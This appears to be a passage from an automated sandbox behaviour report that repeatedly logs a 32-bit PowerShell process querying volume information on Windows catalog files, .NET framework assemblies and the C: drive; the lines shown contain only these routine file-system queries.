              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
